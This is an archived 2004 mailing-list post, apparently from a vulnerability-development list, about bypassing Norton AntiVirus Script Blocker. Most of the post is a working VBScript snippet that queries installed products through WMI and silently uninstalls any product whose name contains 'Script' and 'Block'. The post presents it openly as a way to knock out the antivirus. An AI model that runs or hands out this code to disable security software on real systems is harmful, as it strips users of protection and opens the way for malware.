Vulnerability Development: Norton Anti Virus Script Blocker bypass using script(vb,js,...)
Norton Anti Virus Script Blocker bypass using script(vb,js,...)
('binary' encoding is not supported, stored as-is)
DoS out NAV using WMI, used to work for the last years
i think it's not supposed to work this way
set wmi=GetObject("winmgmts:{impersonationLevel=impersonate}!\\.\root\cimv2")
for each e in wmi.ExecQuery("Select * from Win32_Product")
on error resume next
if instr(e.name,"Script") and instr(e.name,"Block") then
e.UnInstall()
end if
next
=)
Received on Jul 16 2004
|